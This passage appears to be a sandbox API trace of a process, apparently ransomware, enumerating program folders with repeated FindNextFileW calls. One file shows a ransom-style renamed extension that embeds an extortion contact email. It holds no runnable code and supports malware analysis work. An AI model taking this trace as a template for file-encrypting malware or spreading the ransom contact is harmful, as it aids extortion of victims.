ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x18888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTOInstaller.exe", cAlternateFileName="VSTOIN~1.EXE")) returned 1 [0157.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.961] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x0, dwReserved1=0x0, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0157.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.970] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4ae972f5, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VSTO", cAlternateFileName="")) returned 0 [0157.970] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0157.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.971] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c11068, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a412e70, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0157.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.971] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0157.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.973] FindNextFileW (in: hFindFile=0x728388, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43854cb5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x43854cb5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x43854cb5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll", cAlternateFileName="")) returned 1 [0157.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.974] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="DirectDB.dll", cAlternateFileName="")) returned 1 [0157.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.975] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d7f179, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="msadc", cAlternateFileName="")) returned 1 [0157.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.977] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41da7e83, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x41da7e83, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41da7e83, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="msadce.dll", cAlternateFileName="")) returned 1 [0157.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.978] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0d8186d, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Ole DB", cAlternateFileName="OLEDB~1")) returned 1 [0157.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.980] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440870df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440870df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440870df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18600, dwReserved0=0x0, dwReserved1=0x0, cFileName="msdaosp.dll", cAlternateFileName="")) returned 1 [0157.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.981] FindNextFileW (in: hFindFile=0x728348, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x440d35a9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x440d35a9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x440d35a9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd0a00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="wab32.dll", cAlternateFileName="")) returned 1 [0157.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.981] FindNextFileW (in: hFindFile=0x728308, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bb043c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0c5f95f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0157.981] FindClose (in: hFindFile=0x728308 | out: hFindFile=0x728308) returned 1 [0157.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.983] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x330ca4b, ftCreationTime.dwHighDateTime=0x1d5038e, ftLastAccessTime.dwLowDateTime=0x330ca4b, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x330ca4b, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="desktop.ini.id-B4197730.[idecryptyourdata@cock.li].bat", cAlternateFileName="DESKTO~1.BAT")) returned 1 [0157.984] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.984] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a4ec31b, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a4ec31b, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a4ec31b, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExtExport.exe", cAlternateFileName="")) returned 1 [0157.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.985] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc2132d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb77a1634, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb77a1634, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SIGNUP", cAlternateFileName="")) returned 1 [0157.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0157.985] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de69a90, ftCreationTime.dwHighDateTime=0x1d48498, ftLastAccessTime.dwLowDateTime=0xf99f4140, ftLastAccessTime.dwHighDateTime=0x1d4bbb7, ftLastWriteTime.dwLowDateTime=0xf99f4140, ftLastWriteTime.dwHighDateTime=0x1d4bbb7, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="spray-roman.exe", cAlternateFileName="SPRAY-~1.EXE")) returned 1 [0157.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0157.985] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa235ac5b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa235ac5b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Java", cAlternateFileName="")) returned 1 [0157.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.990] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7440, dwReserved0=0x0, dwReserved1=0x0, cFileName="dt_shmem.dll", cAlternateFileName="")) returned 1 [0157.995] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.995] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa89ee6c2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa89ee6c2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa89ee6c2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="policytool.exe", cAlternateFileName="POLICY~1.EXE")) returned 1 [0157.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0157.997] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4040, dwReserved0=0x0, dwReserved1=0x0, cFileName="servertool.exe", cAlternateFileName="SERVER~1.EXE")) returned 1 [0157.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0157.998] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="COPYRIGHT", cAlternateFileName="COPYRI~1")) returned 1 [0158.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4544fe8 | out: hHeap=0x6a0000) returned 1 [0158.337] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa105ca28, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="applet", cAlternateFileName="")) returned 1 [0158.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.337] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b45bd2, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b45bd2, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b45bd2, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x562, dwReserved0=0x0, dwReserved1=0x0, cFileName="calendars.properties", cAlternateFileName="CALEND~1.PRO")) returned 1 [0158.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.338] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0158.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.340] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x0, dwReserved1=0x0, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0158.345] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.345] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xf58, dwReserved0=0x0, dwReserved1=0x0, cFileName="flavormap.properties", cAlternateFileName="FLAVOR~1.PRO")) returned 1 [0158.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.347] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c2a9b3, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c2a9b3, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x368a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hijrah-config-umalqura.properties", cAlternateFileName="HIJRAH~1.PRO")) returned 1 [0158.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0158.350] FindNextFileW (in: hFindFile=0x727e48, lpFindFileData=0x3b3f08c | out: lpFindFileData=0x3b3f08c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c2a9b3, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa129361a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="cursors", cAlternateFileName="")) returned 0 [0158.350] FindClose (in: hFindFile=0x727e48 | out: hFindFile=0x727e48) returned 1 [0158.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.350] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x38, dwReserved0=0x0, dwReserved1=0x0, cFileName="javafx.properties", cAlternateFileName="JAVAFX~1.PRO")) returned 1 [0158.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.350] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c50c02, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c50c02, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c50c02, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x88dc5, dwReserved0=0x0, dwReserved1=0x0, cFileName="jfr.jar", cAlternateFileName="")) returned 1 [0158.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.352] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x0, dwReserved1=0x0, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0158.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.355] FindNextFileW (in: hFindFile=0x7280c8, lpFindFileData=0x3b3f308 | out: lpFindFileData=0x3b3f308*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x0, dwReserved1=0x0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0158.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0158.355] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x3b3f584 | out: lpFindFileData=0x3b3f584*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7406c5a, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7406c5a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x28, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LICENSE", cAlternateFileName="")) returned 1 [0158.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x455bfa0 | out: hHeap=0x6a0000) returned 1 [0158.358] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xa235ac5b, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0de2f82, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xafba0b05, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jre1.8.0_144", cAlternateFileName="JRE18~1.0_1")) returned 0 [0158.358] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0158.358] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457dfb0 | out: hHeap=0x6a0000) returned 1 [0158.358] FindNextFileW (in: hFindFile=0x727d48, lpFindFileData=0x3b3fa7c | out: lpFindFileData=0x3b3fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3ded678, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x3ded678, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7ef, dwReserved1=0xffffbffe, cFileName="Microsoft Office", cAlternateFileName="MICROS~2")) returned 1 [0158.360] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.360] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x831d63af, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x4ef028f, ftLastAccessTime.dwHighDateTime=0x1d5038e, ftLastWriteTime.dwLowDateTime=0x4ef028f, ftLastWriteTime.dwHighDateTime=0x1d5038e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManifests", cAlternateFileName="PACKAG~1")) returned 1 [0158.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x459bfd8 | out: hHeap=0x6a0000) returned 1 [0158.450] FindNextFileW (in: hFindFile=0x727f48, lpFindFileData=0x3b3f800 | out: lpFindFileData=0x3b3f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x83189ec0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeb2fdc25, ftLastAccessTime.dwHighDateTime=0x1d47c33, ftLastWriteTime.dwLowDateTime=0xeb2fdc25, ftLastWriteTime.dwHighDateTime=0x1d47c33, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="root", cAlternateFileName="")) returned 1 [0158.469] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0158.470] FindNextFileW (in: hFindFile=0x728048, 